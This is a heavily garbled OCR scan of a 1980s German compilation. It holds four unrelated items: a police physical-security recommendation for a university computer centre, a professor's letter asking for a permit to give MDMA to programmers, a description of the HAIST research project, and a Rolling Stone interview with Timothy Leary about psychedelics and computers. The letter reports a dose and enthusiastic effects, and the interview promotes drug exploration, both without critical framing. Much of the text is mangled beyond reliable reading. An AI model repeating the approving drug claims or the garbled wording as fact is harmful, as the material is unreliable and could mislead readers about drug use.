(%l Dezernat 202 - Zentralstelle für Sicherungs¬
technik und Beratung
Oll 202 - 2912.7 - 78/85 - 154/85
SBi KHK
TOI
Anlg.I 3 Bl»tt
T.uUnt-.m.l,. li . V.imrtllun, (07 II) W 40-1 Tfl»« 7 IS4 ;;;
2
örtliche und bauliche Gegebenheiten:
Das Rechenzentrum als zu sichernder Bereich befindet
sich im 1. Untergeschoß des Gebäudes. Im Oberteil der
Außenwände sind durchgehend Fenster angebracht, welche
ebenerdig zum Gelände abschließen.
Die Frischluftansaugung erfolgt ebenerdig an der süd¬
lichen Fassadenseite.
Im Erdgeschoß des Gebäudes über dem jetzigen Rechner-
raum soll zukünftig das Reche.nzentrum der Universität
installiert werden.
Sicherungstechnische Empfehlungen:
Um einen effektiven Schutz vor einem Sprengstoffanschlag
aufzubauen, sollten die sensitiven Geräte des Rechen¬
zentrums in einem gesicherte.". Raum mit Stahlbetonwänden
in einer Stärke von mindeste.-.s 20 cm untergebracht werden,
wobei nur eine Tür in entsprechender Ausführung aus cer.
gesicherten Vorfeld in den Syscemraum führen sollte. .
Sollte der gesamte Maschiner.raum als gesicherter Raum
ausgelegt werden, sind folgende Maßnahmen notwendig:
- verschließen der Fensteröffnungen durch Betonplatcen,
- Aufbau eines effektiven Zucangskontrollsysteras,
- Zugang zum Rechnerraum sciire nur über eine Schleuse
möglich sein.
In die mechanischen Sicherungsmaßnahmen sollte auch die
Klimazentrale mit einbezogen werden.
Die Frischluftzuführung sollte mit einem Kamin oder
Schacht an der Außenfassade hochgeführt werden, um das
Einbringen von Flüssigkeiten oder Gasen wesentlich zu
erschweren.
Als Alternative zum Verschluß der Fensteröffnungen kann
innerhalb des Maschinenrauraes ein gesicherter Raum nach
o.a. Kriterien aufgebaut werden, wobei die Vorhandenen
Fenster mit einbruchhemmendan Gläsern nach DIN 52 290
bestückt werden sollten.
Für den räumlichen Aufbau des Universitäts- und Klinik¬
rechenzentrums im Erdgeschoß des Gebäudes sollte an¬
gestrebt werden, an der Außenfassade eine Pufferzone
mit Büroräumen zu errichten.
Der im Plan eingezeichnete Haschinenraura sollte als
gesicherte "Insel" mit einer Stahlbetonwand umfaßt
werden.
Bezüglich des Aufbaus eines Zugangskontrollsystems
mit Schleusenfunktion gelten die für das Rechenzentrum
im 1. Untergeschoß ausgeführten sicherungstechnischen
Empfehlungen.
6 Schlußbemerkung:
Die vorstehend aufgeführten Maßnahmen sind nach hiesiger
Auffassung Mindestforderungen, um den sicherungstech¬
nischen Grundschutz für den Gesar.tbereich Reche.nzentrum
zu erfüllen.
Weitergehende Maßnahmen zur Optimierung- aus sicherungs¬
technischer Sicht lassen sich aufgrund der örtlichen
und baulichen Voraussetzunge.n unter dem Gesichtspunkt
der Verhältnismäßigkeit kaum realisieren.
Sollten für die Sicherung des Rechenzentrums umfang¬
reiche bauliche Maßnahmen geplant werden, steht Ihnen
das Landeskriminalamt Baden-Württemberg für weitere
detaillierte Auskünfte und entsprechende Beratungen
gern zur Verfügung.
Kriminalhauptkomraissar Techn. Oberinspektor z.A.
3
Stuttgart, den 09.04.1985
UNIVERSITÄT DER BUNDESWEHR MÜNCHEN
Fakultät für Informatik
Institut für Systemorientierte Informatik
Professor Dr. P. Molzberger
Programmsyste me für Anwendungen _____
d.r B.nd,.~.hr-Wrrn,r.H.;..nb.r5.W., 39-0-80 14 Ncubib^r,
An das
Bundesgesundheitsamt
Bundesopium-Stelle
Postfach 330013
mit denen wir auch bisher mit Software-Entwicklern experi**
lOOO Berlin 33 mentiert haben. Dabei sind quantitative Messungen vor-
aunehnen. Es geht hier um:
Betr.; Antrag auf Sor.darerlaubnis für Droge MDMA für
wissenschaftliche Zwecke
1. den Thadhani-Effekt
2. Brozesse It. NbP - Neuro-Linguistic Programming.
Sehr geehrte Damen und Herren,
im Rahmen des Forschungsprojekts HAIST haben wir mit MDMA
experimentiert. Da die Droge nach dem Betäubungsmittelgesetz
seit August 1986 nicht mehr erlaubt ist, bitten wir um eine
Sondergenehmigung, um die Experimente fortzusetzen.
Zum Pro~iekt H.ilST
HAIST steht für Human Abilities in Software-Technologie. Es
handelt sich um ein interdisziplinäres Forschungsprojekt aus
Informatik und Psychologie, das auch von der Industrie
unterstützt wird. International arbeiten wir insbesondere
mit kanadischen und US-Wissenscha£tlern zusammen. Bin För¬
derantrag an die Deutsche Forschungsgemeinschaft, zusammen
mit einem Kollegen (Psychologe an unserer Fakultät für
Pädagogik) wird derzeit gestellt.
In HAIST geht es um die Erschliefung von Kreativitätsreser¬
ven von Software-Entwicklern. Einen kurzen überblick entneh¬
men Sie bitte dem beigefügten Ausschnitt aus dem Forschungs¬
bericht 1985 der Universität der Bundeswehr München.
'eitere Information über HAIST, z.B. die Veröffentlichungen,
-^teilen wir Ihnen gern auf Wunsch zur Verfügung.
:u den bisherigen Experimenten mit MDMA
:ie Versuche wurden äuBerst sorgfältig von einem Arzt und
ehreren therapeutisch geschulten Personen vorbereitet und
begleitet, wobei die Gruppe in einer geschützten Umgebung
zwei Tage beisammenblieb. Sie dienten dem Zweck, zunächst
einmal das Mittel kennenzulernen und die grundsätzlichen
Möglichkeiten zu erkunden.
Wir haben festgestellt, daß unter geringen Dosen (ISO mg)
eine Phase extrem hoher geistiger Klarheit auftritt. D'
Klarheit bleibt teilweise auch noch nach Abklinge
Einflusses der Droge (ca. 5 Stunden) erhalten, in einem Fall
bis ca. eine Woche danach. Das äußerte sich in einem Gefühl
. ««qteiaerter Kontaktfreudigkeit und
tiefer innerer Harmonie, gesteiget
erheblich gesteigerter Kreativität und Ueistungsfähigkext^
Ausschließlich an dieser Phase der Klarheit sind wir int
assiert, um sie für unsere Arbeit zv nutzen.
Thadhani-Effekt
Unter diesem Namen ist der Effekt bekanntgeworden, daß
manche Programmierer in einen Zustand extrem hoher
Konzentration und Leistungsfähigkeit hineinkommen, wenn
die Antwortzeit des Computers unter ca. eine Sekunde
sinkt (siehe Abbildung) . Dabei treten im EEG Alphawel¬
len auf. Quantitative Leistung und Qualität der Arbeit
steigen, sprunghaft an. Der Zustand wird als entspannend
und wünschenswert erlebt.
(Ähnliche Effekte kann man bei Kindern beobachten, die
sich voll auf ein Videospiel konzentrieren).
Spitzenprogrammierer sind in der Lage, in einen ähn¬
lichen Zustand auch ohne Biofeedback-Loop Ober den
Computer hineinzugehen.
Eines unserer Zwischenziele wäre, es auch anderen
Programmierern - auch unter weniger günstigen Umständen
- zu ermöglichen, gezielt in diesem Zustand zu arbei¬
ten. wir wissen, daß das erlernbar ist, und wir
vermuten, daß dieser Lernprozeß unter MDMA erheblich
beschleunigt werden kann.
Arbeit mit NLP-ähn lichen Prozessen
Das Ziel ist das gleiche, nur verwenden wir Methoden,
die ursprünglich im therapeutischen Bereich entwickelt
wurden: Bei uns wurde das sog. SUPBRPROGRAMMER- oder
jlj^STERY—Model entwickelt, daß auf einer Synästhesie
(Sinnesüberschneidung) des visuellen, des auditiven und
des kinästhetischen Repräsentations-System basiert) .
Siehe Grinder/Bandler: "Therapie in Trance".
Hier wissen wir aus dem therapeutischen Bereich. daß
die Übertragung derartiger Fähigkeiten unter dem Ein¬
fluß von MDMA sehr viel effizienter abläuft.
Ziel unserer Bemühungen ist der Programmierer, der derar¬
tige Konzentrationszustände wiederum integriert. Von uns
untersuchte spitzenprogrammicrer sind in der Lage, fast
augenblicklich von ihrer Arbeit umzuschalten, um sich z B
auf ein persönliches Gespräch zu konzentrieren.
Vorgesehene A rbeiten
Der nächste Schritt wird dann
Klarheit zur Unterstützung der
bestehen üie Phase der Wir bitten, uns mitzuteilen, unter welchen Bedingung
gleiche Prozesse zu nutzen, bereit wären, uns eine Ausnahmegenehmigung zu erteilen
Dieser Antra$ wurde letziendlich wegen Erfolglosigkeit nicht gestellt,
aber...
eix
Sie
UNTERSUCHUNGEN AN S?ITZSNPROGRAMMIERERN UND SPITZE NTEAMS
(HAIST) HUMAN AHILITIES IN SQFTV.'ARE TECHNOLOGY -
Beteiligte Nitatbeiter: Dipl.-Ing. Georg V. Zeraanek
Laufzeit:
Pro]ektförderung:
ab Oktober 1984
Siemens AG
FAKULTST FÜR INFORMATIK
Institut für Systemorientierte Informatik
Professur für Prograramiersysterae für Anwendungen
Prof. Dr.-Ing. Peter MOLZBERGER
Zusammenarbeit mit: Siemens AG, München
Human Technologies GmbH, .München
Institut für Orcanisationsberatung und Technologie-Anwendung
(lOT), München
TEKNICOM Ottawa, Kanada
Im Projekt HAIST gehen wir davon aus, daß
unsere Grenzen in der Fähigkeit, große
Software-Systeme zu entwickeln, heute
nicht mehr primär durch technologische
sondern durch menschliche/zwischenmensch¬
liche Faktoren bestimmt werden.,D.h. es
ist ein fühlbarer Fortschritt auf diesem
Gebiet heute nur noch erzielbar, wenn
psychologische und soziotechnische Aspek¬
te weit me'nr als bisher in den Brenn¬
punkt rüc.ken.
Ausgehend vom "Superprogramming Effekt",
der Tatsache, daß einige Softwareleute,
in ihrer Leistungsfähigkeit, sowohl
quantitativ wie qualitativ, um eine
Größenordnung über dem Durchschnitt lie¬
gen, werden Untersuchungen über die Ar¬
beit des Software-Entwicklers, insbeson¬
dere über die Natur des kreativen Prozes¬
ses, durchgeführt. Wir arbeiten beispiels¬
weise mit NL? (Neurolinguistic Program¬
ming) , um exzellentes Verhalten von In¬
dividuen zu analysieren, modellhaft zu er¬
fassen und auf andere Individuen zu 'über¬
tragen. Theoretische Ergebnisse werden im
Ralunen der Superprogramming-Seminare un¬
ter Marktbedingungen erprobt.
Veröffentlichungen:
- Molzberger, P.: Software-Entwicklung für
Führungssyste.me - eine Herausforderung
an das Bewußtsein der Bundeswehr. In:
Hofmann, H.VJ., Huber, R.K., .Molzberger,
P. (Hrsg.); Führungs- und Informations¬
systeme. Oldenbourg, München 1932
- .Molzberger, ?.: Und Programmieren ist
doch eine Kunst. In: H. Schelle und P.
Molzberger (Hrsg.): Psychologische As¬
pekte der Software Entwicklung. Oiden-
bourg, München 1983
- Molzberger, ?.-. Aesthetics and Program¬
ming. In Proc. CHI '83 Human Factors in
Computing Systems (Boston, December
12-15, 1933), ACM, New York 1983
- Zemanek, G.V.: Psychologische Ursachen
von Programmierfehlern. In: Psychologie
des Programmierens. Schauer, H. und .M.
Tauber (Hrsg.). Schriftenreihe OCG,
Band 20. Oldenbourg, Wien-München 1933
- Molzberger, P-: Transcending the Basic
Paradigm of Software Engineering, Be-
Auf der Ebene der Teams experimentieren
wir mit ‘synergetic groups', d.h. Teams,
die hinsichtlich Leistung, Qualität und
persönlicher Zufriedenheit um einen deut¬
lichen Faktor über dem Durchschnitt lie¬
gen. Hier besteht ein enger Informations¬
austausch zu G. Weinberg, Lincoln/
Nebraska, der in seinem Buch "Psychology
of Programming" 1971 erst.mals über derar¬
tige Effekte unter dem Titel "egcless"
programming" berichtete.
Ein weiterer Schwerounkt der Arbeiten sind
Procramnierfehler und die .Aufdeckung der
psychologischen Faktoren, die zu diesen
"Fehlleistungen" führen.
In Zusammenarbeit und unter finanzieller
Förderung durch die Siemens .AG arbeiten
wir an der Gestaltung von Sof tv/are-Tools,
die die Forschungsergebnisse berücksich¬
tigen und insbesondere geeignet sind, den
kreativen Prozeß anzuregen.
Im Herbst 1983 wurde im Vorfeld dieses
Projektes ein zweitägiger Workshop "Pro¬
grammieren mit der rechten Kirnhäifte"
ausgerichtet.
rieht Nr. 3405, Fachbereich Informatik,
Hochschule der Bundeswehr .München ,
f
- Molzberger, ?.: 3er Computer als Kommu¬
nikationspartner. In: Psychologie^der
Computerbenutzung, Schauer, H. und M.J.
Tauber (Hrsg.). Schriftenreihe OCG,
Band 22. Oldenbourg, Wien 1584
- Zemanek, G.V.: Schnittsteilenentwurf am
Beisoiel einer .Aufzuqssimulation. In:
Psychologie der Computerbenutzung. H.
Schaue,r und M.J. Tauber (Hrsg.). Schrif¬
tenreihe OCG, Band 22. Oldenbourg, Vlien-
München 1934
- .Molzberger; ?.: Can we Teach Conscious-
Ly Excellent Programming? Proc. WCCE 85
(World Conf. on Computers in Educa-
tion), Norfolk/Virginia, August 1985
- Zemanek, G.V.: A Formal Tool for
Checking Program Thinking. In: formal
models in programming, E. Neuhold, G.
Chroust (Hrsg.) , North Holland 1935,
S. 137 - 142.
TIMOTHY LEARY
■ms generation of baby boomers is
76 million sirong. They can
do whatever they want.
/S THE [armer
^ so^calUd LSD
ru, vhitt da you ihmk of N^<7
'agan’s adnce on drug! -
'*Our kids should bc betccr
anneted dian that! We should
U them, "Just say, 'No, thank
,u.’ ” Any blanket "Just say
□ ” is a negative approach to
fe, which is typical of the Rea-
an adminiscration.
So you duogree vith the huge an-
Sug campuign?
I’m totally opposed to non-
,dult5 using any drug. However,
he use of drugs by kids should
X easily handled ln a family in
vhich there is trust and com-
munication. The facc that kids
in the ghetco use dtugs is
viewed the wrong way. The
Problem ^^t Ae u no com-
families wherc there are no modcls, m
™ -N». ■“'«•""
‘'''sta«e bLi ihe ntws? Ajailiiiü
posed .0 make Aetr own „.^ent pro
ters. I am consotuuonally °PP°=^ “p® to. AdActs
Abiuons ^amstmy us^^y d^^ by definraon, slck
pose a different prob e , ^ ’ druggie or a gun
people. If you low an co o ^ ^
freak, mtervene. «“JZm acnng irre-
money or guns .^^oAd p e can and do use
OTOGKAPH by WILLIAM COLIPOt^
danüerous maclunety or who tun nuclear plane. I don’c
want Ae pilot of my plane haUueinaong. Bur intelh^nt
inAviduals are not going to work for cor^es fet
would force Aem to do demeaiung things Ute pee ,
LdeGodknowswharAeywoAdwantn««- -
^ In retrO!pect, whut was the ngn^unce rfihe Satm drug
W a strong tUx» discouraging expeAnenm-
Ae huml brain. Before rhe Renaissance,
oon wiA Ae ^ ^ discovenng
Aere was a str ng progress m
Kow the body worked Ihis W ^ ^
medicAe W biolo©' ■ must leam how
ohJlenge Aces ^uinan^t^
tbe brain works. Tte s psyAedelic
^d MülUook durmg None of
"‘SriLi^rr^tÄ’was hapi^nmgwhenwe took
psychedelic drugs, because we
had to use Ae mysdeal langpage
of the past - Hmdu terms like'
salori and samhadi, occadt terms
like illummitm and transcendental
We didn’t have the scientific
metaphors to understand wbat
we were discovering.
And ve do not»?
Yup. We had to have a per-
sonal-computer movement to
help US understand the brain.
You see, we can oAy understand
out mner workmgs m terms of
Ae extemal, mechanical oc tecA-
nological models Aat we build.
We nevet understood Ae circu-
ladon of Ae blood und we had
hydraulic Systems moving watet
around. We didn’t understand
metabolism until we had mas-
tered Aermodynamics wiA Ae
steam engine and understood how coal and oil produce
power and enetgy. Only Aen could we figpre out how
carbohyAates and proteins work. Coming from an m-
dustriaE mechanical culture, how could we possAly un¬
derstand Ae brain? Und recendy we Aou^t Ae brain
was a machine like a big telephone System. This is a
completely madequate memphor. The psychedelic-
drug movement of Ae Sixties and Ae personal-com-
puMt movement of Ae Eighties are inner and outet
reflccdons of each oAer. You simply cannot under¬
stand psychedelic drugs, which activate the brad,
unless you understand something about Computers.
It is no accident Aat many of Ae people A Ae Com¬
puter movement bad experimented wiA LSD.
And whal vas kamed?
Every petson who took acid has his or her own sto-
ty to teil Thai’s Ae beaudfiil Aing about ic Certainly
Timothy Leary
there is no one who had an experience with LSD vviio
didn’c have an unforgectable, overwhelming experience.
HofW da coTTtputers help our inner explaration?
G)mputers Help us iinderstand how our brains proc-
css informacioa For example, as a psychologist, I was
taught that ehe synapse, wherc two nerve endin^ ex-
change informadon, was a sort of on-ofF switching de-
vice. That is not true at alL At the synapse there are
millions of quantum signals, like an enormous television
screen. There is probably more complex informarion
cxchangcd beeween one synapse and another than in
mosc Computer programs. But I have co have an under-
standing of Computers to be able to say thac There is a
wonderflil paradox here: we can oniy navigate outside
as well as wc can navigate within. What happened in
the Sixties was that we did a lot of inner tripping, but
we lacked the cybernetic-Ian-
guage technology to express
and map and chart what we
werc experiencing.
Do you miss the Sixties?
Not rcally, diough 1 must say
it was a fantasde age of explora*
doa We had that old-dmc H92
Columbus fever. We sensed that
we were brain cxplorers We in-
tuirivcly used metaphors of travel
- "tripping,” "comtng down,”
"head pilots,” "guiding voyag-
crs.” The metaphor ^tuming on”
relates to aedvadng che television
sec and boodng up che Computer.
These äays, the dru^s in vogue
are not mmd expandmg. What does that say about the time?
The drugs that are populär coday — cocaine, pills,
ecstasy, Venus, Eve — cend to alter mood rather than
expand consciousness. They can be instrucrive and
fun if handied prudendy. But we still have to leam
how to communicate what we experience. Let’s be
frank: there will be new, improved drugs and waves
of inremal explorarions.
With what end?
It is a genedc imperadve to explorc die brain. Why?
Because its there. If you are carrying around in your
head 100 billion mainfirame Computers, you just have to
gec in there and leam how to operate them. There is
nodiing in the outside universe that isn't mirrored and
duplicated inside your brain.
Do you feel a kmdred spirit with the people who are iden~
t^ed with the drug moyement, such as Richard Alpert —
aJ{-a. Rom Dass — and novelist and Merry Pranhter leader
Ken Kesey?
Sure, although we all evolved so differendy. Richard
talks about going back to che sourcc, which means go-
ing back to the pasL For many good reasons, Richard
committed himself to an extremely archaic Hindu or-
thodoxy. But it’s a pcaceliil phüosophy of caring and
chanty. Richard was the Mocher Teresa of the psyche«
delic movemenL You can’c knock that. But Ram Dass
ain’t gonna blow your mind open with new revelations,
and he ain’c gonna encourage you co storm the ^tes of
the info-space heaven with cybemedc bramware.
How aboui Ken Kesey?
Ken Kesey and his wife, Faye, are real Western he-
roes. Mydiic ranchers. Frontier people. Oregon Trail
folk. Salt of die good earth. Rugged-individualist peo¬
ple you can depend on in a crunch.
How about others associated with that penod? Abbie
Hoffman? ■.
Abbie Hofiinan is a wonderflil legend. The most
radical, eloquent, rabble-rousing agitator of our time.
Jerry Rubin?
Jcrry’s your basic YMHA dircctor, a likable young
exccurive. Jerry is a liberal conformisL He could just as
well have bcen a young liberal Rcpublican. Hes cer-
tainly not your new Aristode or Plato.
What was his role tben?
He had his own Holy Grail quest. He certainly was
out there in the front Ünes. And he has a certain or^n-
izadonal charm, which I admire. If you’re looking for a
veterans-of-che-Sixties consensus here, Fd guess that
ninccy percenc of che pecple who were involvcd in die
psychedelic brain-discovery movement would cell you
that LSD paved che way fer mosc of che culcural evenis
of the last two decades — ecoic^, New Age, Shirley
MacLaine, che hom«agatn pe rsonal- religion stufr, the
peace movement, che pcrsonal-Timess craze, pop art,
personal-compucer hacking, MTV, Blade Rjomery Sat-
urday Night Live and die cybemedc Emilies.
Cybemetic?
I diink each decade in the roaring twendeth Century
has produced new technologies and art forms for per-
sonalizing and popularizing electronic, light-speed
quantum energies. Since 1900 our socicty of factory
workers and farmers has beai transformed into an in-
iorniadon-age culturc cocally committed to flasJiing re-
aliücs on screens, Americans spend more dmc looldng
at television monicors than they do gazing into the eyes
of fkmily and friends. Power, politics and culture are
determined by who Controls the screens.
How does this cffecl you?
I foUow che trends of evolurion. I go with the elec-
tron flow. I see myself as a quintcssendal American,
just going along for the ride,
Qiantessential? You?
Hey, Fm sixty-seven ycars old. I have aedvely expe-
rienced seven decades of acceleratcd change. Fve
surfed each of che waves of the twendeth Century with
reasonabie success and an enormous amount of fun. In
the Forties, I was in the army for five ycars and in
school on the Gl bill for five years. What could be
more apple pie? In the Fiftics, I was a button-down
young Professor with Idds, a Äiburban house, drinldng
mattmis. In the Sixdes, I dudfuily, düigendy tumed on,
tuned in and, God knows, dropped oul What was the
alternative? Tum off, tune ouq blindly conform?
The Sevendes was the dec^e of the polidcal pris-
oner. Nixon threw the dissenters in jail I was che first
one to go into prison; January 1970. Then, afrer Wa¬
tergate, it was the Nbion gang’s tum. In the next six
years, I watched my federalpursuers join me: the attor¬
ney general, John Mitchell; Haldcman and Ehrlich-
man; Gordon Liddy. Now, in che Eighries, how can
you avoid the Computer revoludon?
Can you describe your work in the Computer jield?
My work involves cybcmetic psychology - the per-
sonalizadon and popularizadon of quantum mechanics.
Packaging and communicacing choughts at light
speeds. Fhicdng electronic appliances in the hands of in-
dividuals. First we had the telephone, then radio,
movics, television. Now we have Computers, video
playcrs, compact discs, home-ediring appliances. It’s
still just the beginning. ln che next five years we’re
gonna design you an inexpensive electronic facilicy
for your living room. You’U be able to move Infor¬
mation and Images around on your screen in whatev-
er way you want. Now, that’s revoludonary.
In what ways?
In the twenty-first Century,
whoever Controls the screen Con¬
trols consciousness, information
and thought. The screen is a
mirror of your mind, get it? If
you are passively warching
screens, you are being pro-
grammed. If you are edidng your
own screen, you aie in control of
ycxir mind. George Orwell had it
wrong. He was coo optimistic.
He wrotc in 1984 chat Big
Brother would watch us from
screens on ihe walls of our living
rooms or bedrootns. But that is
noching. You could edways duck
out of sight. The current Horror is that Americans
voluntariJy stick their amoeboid faces toward the
screen six or seven hours a day and suck up informa¬
tion that Big Brother is putting there. Here is the
key to our future: We can and will control our own
screens. Wc arc designing Software that will empow-
cr you to prcxluce and direct your own mind movies,
your own prime-dme shows.
And how will if <ff]ect us?
This will create a new model of human being, the
cybemedc person. A new movement is emerging.
It’s something like the beatniks of the Fifries or the
Hippies of the Sixties. It’s callcd cyberpunk. The
concept comes from William Gibson’s book Neuro-
mancer. Cyberpunks arc individuals who have the in-
tcHigence and the courage to access and usc high-
quantum technology for their own purposes and
their own modes of communication.
For example?
Li the movie WarGames the Idd is a video hotshoL
At school, the authoritarian, smug teacher gives him a
hard time. He goes to the prindpal’s office, gets the
Computer code and goes home and changes his grade.
He ends up using his cyber skills co match wits with the
Pentagon Computers. Another example of cyberpunk
was che young man from Hamburg, Mathias Rust,
who piloted a small Cessna through the electronic
nets and defense Systems of the Russians and landed
in Red Square. Why? Not for the CIA, not for the
German army, but for his own fucking pleasure. He
b a classic cyberpunk. Charles LLndbcrg, che Lone
Eagle, was another. Stanley Kubrick. Jann Wenner.
Steve Jobs. I could go on.
And they symbolize what?
Taldng control of the haturc oursclves. Ignoring
old-dme insdtudons and archaic polidcs. You don’t or-
SD paved way for mMt
of the cultural eventd of the laot two decade.) -ecology, thefitncA)
craze, the peace nwvement, Shirley MacLaine ..
Timothy Leary
ganizc in old-time polidcal groups or get involvcd in
campaigns for polincal office. You don’t gct involued in
thc old stTUggle for or against Big Broiher. You pilot
out to thc frontier and navigate a new life. Cyhcr comes
from the Greek word for "pilop” Once you dcclare
your independencc in your mind, you’re home free.
As more and morc people become free agents, or
cvber pilors, it’s gonna make an cnormous differenct.
vyfrcn we get just ten perccnt of thc people operadng
this way, it wjl clmngc the System, becausc thcy arc the
smartest ten percenL Star Vv^ars, for cxample, cannot
operate if ten perccnt of the Computer techies think for
themselvcs, To run a modern socict>' you depend upon
skilled, innovative quanmm intelligence. Tltese are ex-
acrly thc people who arc not go-__
ing to bccomc va.ssals to an eco- ff-
nomic or political organiaaoon. |
In his Book Neurovumm, Gib- |
son spells out a soaology for thc 1 ly//
rwcnty-firsr Century that makes a I //.
lot of scnse. The world is con- | ß' p
trollcd by international global |
comhincs based in Japan, Ger- || . •,/,//.£
many, Switzcrland. Nationalism I (j£mlll^ WLch tnC Oedt-
i,s down. The multinationals |
won't allow war to break out; ^ucütcdqencration
chey can’t let die Russians bomb ^
Amcnca, bccausc diey own most • / • . O r ■
of America. And it’s an anumng- Ul bldtory. ÜIU
ly free world. The international
combincs don’t carc about your ÜOt U brUUl
lifescyle. They just wart us all J 3
to b« Consumers witli individual ,, ^ •,/ ■
options. They’rc not like thc Is- OreMCO Up Wlth
lamic fundamentalists or the
Reagan right-wingers or che rwwhcrt tO QO,'
communist moralists. They
don’c carc whac your sex life is.
They don’t carc what drugs you
takc, as long as you consume. —
So tlicrc arc going to bc cnor¬
mous free markets operacing
according to die laws of supply
and detnand - the basic form of democracy.
WAo is mo!t ihrcalercd hy this idca?
The nationalists and the religious people- Their
power will be greatly diminished.
And what ntll happen m thc fsoliheal arena?
Polirics are going to change in die nen two to six
jears, when thc baby-boom gencrarion comes of age.
The baby boomers, bom 1946 to 1964, are now be-
twecn ehe ages of forry-one and twenry-three. The
1988 elcaion is the first in which every baby boomer'
will bc over twenty-one The older ones are going to be
nmning for office. That means in 1988, and certmnly
in 1992, thc baby boomets, the Summer of Love kids,
v.tI1 takc over. This generanon is 76 million strong.
They’U bc in thc position of the shark in the swimming
poo( thc polar bear in the small igloo. They can do
whatever they fiickin’ want,
Yet young people today seem morc consertatne thart ever.
1 don’t think thc old terms like liherJ or conserratiK
make much sense. They are individualists - skepncal,
even cynicak about partisan polides. They’ve secn their
ideals dashed with Vietnam, Watergate, Iranscam.
These veterans of the Sixties are tough cooldes.
But hem lang will it takc to get this techrwlogy mto the
hartds of more people?
Good poinc. I can only repeat that the personaliza-
tion and popularization of high technology is the key.
Popularization means cybcrnetic appliances in the
hands of thc people. It is not just the personal Com¬
puter. It’s any electronic technology that allows you
to change your screcn. With the new tape-editing
appliances, you can become die director and produc-
er of what you and your Family see. You can Com¬
bine educational programs with entertainment, cre-
ate coUages with your own X-rated home movics and
Bits you taped off CNN news.
Yo w won’t be dependent on oulside programmers for all
our entertammeni and informaheau
Exactly. Don’t forget these media programmers
want absolute control over our minds. When it s on my
screen, I’ll dccide how it plays.
■'iHi M mi.MiiBMi' i .Mui « "fljg ßjst tune 1 gor tumed on to
the new cyber-pilor idea was in a
r Video arcade. 1 watched my
grandchildren moving rockets
around on thc screens. Well, if
you can do that with blips, you
' can do it wiib ideas.
People like Jerry FaUell and Ed
h thc bcdt- Meese probabty woiddn’t be loo hap¬
py with your cyber-pilot ceneepL Are
• you coneemed about thc regressise
encraiwn represemed by Falwell and the
Meese commisrion?
T/. ßut They must be scotned and
ridtculed. Still, when you think
, / • about it, the Meese Commission
a raui doesn’t really hurt self-directed
Amcricans very mucK It stirs up
up with .a lot of excitemeni. If 7-E!even
won’t seil me Playboy, I’U just go
ctOüo’' ^ another störe down the block.
3 ' The poverty thing is what huns:
people in the undcrclass deprived
of information, discouraged from
leaming cyberaeric skilk
■ “ How do you propose we eorrtbal
My Company, Futique — that’s
che opposite of arttique — has joined up with Activision
CO produce Software programs that are so inexpensive
and attractive that ghetto kids can cjuickly pick up thc
new language of screens and icons. More and more of
che cybemede equipment will become available. It will
filter into all homes eventually,just like the celevision.
You speak Io many College audiences. What do you find
out there?
YHIt are dealing widi the best-educated gencration in
hiscory. They are a hundred dmes bettet educated than
their grandparencs, and ten rimes more sophisricated.
There has never been such an open-minded group.
The problem is that no one is giving them anydiing ftesh.
Thcy’vc got a brain dressed up with nowhere to go.
What da they expecl when they cometo see Tim Leary?
The average College Student doesn’t know who I
am. They weren’c even bom in tele ttamour. But woid
gets aioiid. The rumor is that Vm »meone vaguely
counterculture and highly controversiaL
Wbal are you nying Io comrruaucale to them.
This is the golden age of inteffigence. Instead of
E = mc^ it’s I = mc^, where i is informanon. Accord-
to tte formula, the aim is to acuvate your mind,
^aken new ideas, improve your commun.cat.on
sldlls. Pilot your life. Smarten up.
And are the College kids resportdmg?
I sense that a lot of College Idds envy the Sixties.
They feel they have missed something. Today there’s
not the exdtement and the feeling of change, dhe feel-
iitg of engagement, that existed eben- So they cend to
respond with enthusiasm to common-sense proposals
for personal change.
ll's ironie that the Sixties are yiewed so fcmdly when matty
emergedfiom that period eompletely dsstUusioned.
It depends on your viewpoint The so-called Sixties
actually started in 1967, when the oldest baby boomer
became twency-one. The Summer of Love was a com-
ing-of-agc paity. It was triggered symbolically by die
Beatles’ 5gt. Pepper album, which changed rock 8i roll
into a new and powerftJ cultural form. There had been
prepararions for it in jazz, m the beatniks, in Elvis Pres¬
ley, in the rhythm äC blues stufif, people like Ray
Charles. And che early elitist drug stuff, Ken Kesey
and our group at Harvard. But che signal wem glob¬
al with Sgt. Pepper. Every year afier 1967 produced
another public eruption: the 1968 Chicago riots;
Woodstock in 1969; Kent State in 1970. I thiidt the
Sixties peaked in 1976 when we clected a hippie-
dippy, Howdy Doody guy named Jinuny Carter as
President. Gartet was quoetng Bob Dylan and talking
about peace and love and civil rights and human
rights. How Strange that seems today!
The Spirit of the Summer of Love in America
ended with a thud in 1980 when we eleaed Nancy
Reagan as Commander in chief. But it rippled out
globaJly. It surfaces whenever young people gec rid
of the old World War II generals. Spain after Fran¬
co started iB summet of freedom. Portugal. Braail
when the colonels got the boot. Argentina. The
Philippines. What’s happening in South Korea right
now looks familiär, doesn’t it? College kids and civil-
ians in shirt sleeves standing up to the helmeted na¬
tional guard? Shades of Kent State. And now, exact¬
ly twenty years later, the Summer of Love b hitting
Russia. Glasnost! Openness! Punk-rock clubs in
Moscow! Gorby singing "Give Peace a Chance”!
Mrs. Gorby quocing Lennon - John, not Vladimir
Ilyich - to Yoko Ono!
Irn'l the Reagan admirustrabon out of Step with all this?
]c doesn’t matter. It cannot stop the evolutionary wav^
When it is time fcir the human spexies to activare their
new brain efteuics, it’s gonna hafpea Nothing is going to
stop ir! There is no way you can pass laws against die re-
lendess increase in human intelligence. The evolunon of
precise technology is so seductive. There’s no way you
can stop individuals ftom exploring their brains and using
the new cybemetic-knowledge appliances.
ln the meantme?
TTie old game goes on. It is the genetic duty of the
power holders to in every way discourage change in the
gene pooL This means that those of us who are wired
to change have to be really smart and really tough. If
we can’t prevail over turkeys like Meese and Falwell
dien fuck iq we don’t deserve to get into die future'
If we can’t outmaneuver vaeuous four-letter robots
like Bush and Bork and Kemp and Dole, dien we
bettet go back to school to smarten up. We are
dealing with moral-mental pygmies herc. We can
navigate around OUie Nordi’s 600-ship navy [rmifej
hroadly]- They don’t have a chance.
t N T E R V I E
DAVID SHEFF
aus dem “Rolling Stone"
UNTERRICHTSBLÄTTER
DER DEUTSCHEN BUNDESPOST
AUSGABE B fernmeldewesen
SCHRIFTLEITUNG
Schriftleitung der Unterrichtsblätter der D8P, Fernmeldewesen
_ Postfac h 555, 2000 Hamburg 36
Herrn
Werner Pieper
Alte Schmiede
69^-1 Löhrbach
Unterrichtsblätter Jg. 39/1986, Nr. 9, S. 371-391
Fernmeldewesen ISDN 1-21
